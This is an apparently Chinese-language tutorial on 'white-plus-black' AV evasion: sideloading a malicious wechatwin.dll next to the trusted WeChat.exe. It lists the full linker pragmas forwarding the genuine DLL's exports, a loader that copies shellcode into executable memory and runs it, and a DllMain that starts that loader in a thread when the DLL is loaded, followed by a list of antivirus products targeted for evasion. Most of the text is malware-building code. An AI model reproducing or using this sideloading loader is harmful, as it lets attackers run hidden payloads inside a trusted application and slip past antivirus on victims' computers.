白加黑源码免杀学习

概述

白程序：WeChat.exe

恶意dll:wechatwin.dll

制作流程

• 获取导出函数列表

  #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@$$QAV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@$$QAV0@@Z,@1")
  #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@ABV0@@Z=tmp3ACF.??0IChannelLogWriter@@QAE@ABV0@@Z,@2")
  #pragma comment(linker, "/export:??0IChannelLogWriter@@QAE@XZ=tmp3ACF.??0IChannelLogWriter@@QAE@XZ,@3")
  #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@$$QAV0@@Z,@4")
  #pragma comment(linker, "/export:??4IChannelLogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4IChannelLogWriter@@QAEAAV0@ABV0@@Z,@5")
  #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@$$QAV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@$$QAV0@@Z,@6")
  #pragma comment(linker, "/export:??4ILogWriter@@QAEAAV0@ABV0@@Z=tmp3ACF.??4ILogWriter@@QAEAAV0@ABV0@@Z,@7")
  #pragma comment(linker, "/export:??_7IChannelLogWriter@@6B@=tmp3ACF.??_7IChannelLogWriter@@6B@,@8")
  #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHKI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHKI@Z,@9")
  #pragma comment(linker, "/export:?AddExtraMem@TXBugReport@@YAHPAXI@Z=tmp3ACF.?AddExtraMem@TXBugReport@@YAHPAXI@Z,@10")
  #pragma comment(linker, "/export:?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z=tmp3ACF.?AddIgnoreHookCheckModule@TXBugReport@@YAXPB_W@Z,@11")
  #pragma comment(linker, "/export:?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z=tmp3ACF.?AddReleaseMonitorPoint@TXBugReport@@YAXPAJ@Z,@12")
  #pragma comment(linker, "/export:?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z=tmp3ACF.?DoBugReport@TXBugReport@@YAJPAU_EXCEPTION_POINTERS@@PB_W@Z,@13")
  #pragma comment(linker, "/export:?GetBugReportFlag@TXBugReport@@YAKXZ=tmp3ACF.?GetBugReportFlag@TXBugReport@@YAKXZ,@14")
  #pragma comment(linker, "/export:?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ=tmp3ACF.?GetBugReportInfo@TXBugReport@@YAPAUtagBugReportInfo@1@XZ,@15")
  #pragma comment(linker, "/export:?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ=tmp3ACF.?GetCustomFiltFunc@TXBugReport@@YAP6AHPAU_EXCEPTION_POINTERS@@@ZXZ,@16")
  #pragma comment(linker, "/export:?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z=tmp3ACF.?InitBugReport@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@Z@Z,@17")
  #pragma comment(linker, "/export:?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z=tmp3ACF.?InitBugReportEx@TXBugReport@@YAXPB_W000GGKHHKKP6GHPAUtagBugReportInfo@1@PBD200PAPAXPAKPAX@ZH@Z,@18")
  #pragma comment(linker, "/export:?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z=tmp3ACF.?RaiseSelfFatalException@TXBugReport@@YAXW4SelfException@1@@Z,@19")
  #pragma comment(linker, "/export:?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z=tmp3ACF.?RecordCallStackIfNeed@TXBugReport@@YAXPAJ@Z,@20")
  #pragma comment(linker, "/export:?SetBugReportFlag@TXBugReport@@YAHK@Z=tmp3ACF.?SetBugReportFlag@TXBugReport@@YAHK@Z,@21")
  #pragma comment(linker, "/export:?SetBugReportPath@TXBugReport@@YAHPB_W@Z=tmp3ACF.?SetBugReportPath@TXBugReport@@YAHPB_W@Z,@22")
  #pragma comment(linker, "/export:?SetBugReportUin@TXBugReport@@YAXKH@Z=tmp3ACF.?SetBugReportUin@TXBugReport@@YAXKH@Z,@23")
  #pragma comment(linker, "/export:?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z=tmp3ACF.?SetCustomFiltFunc@TXBugReport@@YAXP6AHPAU_EXCEPTION_POINTERS@@@Z@Z,@24")
  #pragma comment(linker, "/export:?SetExtInfo@TXBugReport@@YAHKKPB_W@Z=tmp3ACF.?SetExtInfo@TXBugReport@@YAHKKPB_W@Z,@25")
  #pragma comment(linker, "/export:?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z=tmp3ACF.?SetExtRptFilePath@TXBugReport@@YAHPB_W0@Z,@26")
  #pragma comment(linker, "/export:?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z=tmp3ACF.?SetLogFileMd5Dir@TXBugReport@@YAHPB_W00@Z,@27")
  #pragma comment(linker, "/export:?UninitBugReport@TXBugReport@@YAXXZ=tmp3ACF.?UninitBugReport@TXBugReport@@YAXXZ,@28")
  #pragma comment(linker, "/export:?ValidateBugReport@TXBugReport@@YAXXZ=tmp3ACF.?ValidateBugReport@TXBugReport@@YAXXZ,@29")
  #pragma comment(linker, "/export:?pfPostBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPostBugReport@TXBugReport@@3P6AXXZA,@30")
  #pragma comment(linker, "/export:?pfPreBugReport@TXBugReport@@3P6AXXZA=tmp3ACF.?pfPreBugReport@TXBugReport@@3P6AXXZA,@31")
  #pragma comment(linker, "/export:SignWith3Des=tmp3ACF.SignWith3Des,@32")
  #pragma comment(linker, "/export:StartWachat=tmp3ACF.StartWachat,@33")
  #pragma comment(linker, "/export:_TlsGetData@12=tmp3ACF._TlsGetData@12,@34")
  #pragma comment(linker, "/export:_TlsStoreData@12=tmp3ACF._TlsStoreData@12,@35")
  #pragma comment(linker, "/export:__ASSERT=tmp3ACF.__ASSERT,@36")
  

• shellcode写入内存加载

  DWORD WINAPI jmp_shellcode(LPVOID pPara)
  {
  	void* exec = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  	memcpy(shellcode, first, 2);
  	memcpy(shellcode + 834, a, 2);
  	memcpy(exec, shellcode, sizeof shellcode);
  	((void(*)())exec)();
  	return 0;
  }
  

• DllMain执行jmp_shellcode

  BOOL WINAPI
  DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
  {
  
  	HANDLE threadHandle;
  
  	switch (dwReason)
  	{
  	case DLL_PROCESS_ATTACH:
  
  		// Create a thread and close the handle as we do not want to use it to wait for it 
  
  		threadHandle = CreateThread(NULL, 0, jmp_shellcode, NULL, 0, NULL);
  		CloseHandle(threadHandle);
  
  		break;
  
  	case DLL_PROCESS_DETACH:
  		// Code to run when the DLL is freed
  		break;
  
  	case DLL_THREAD_ATTACH:
  		// Code to run when a thread is created during the DLL's lifetime
  		break;
  
  	case DLL_THREAD_DETACH:
  		// Code to run when a thread ends normally.
  		break;
  	}
  	return TRUE;
  }
  

免杀效果：

360安全卫士（360安全大脑）

版本：

效果：

360杀毒、火绒

Windows Defend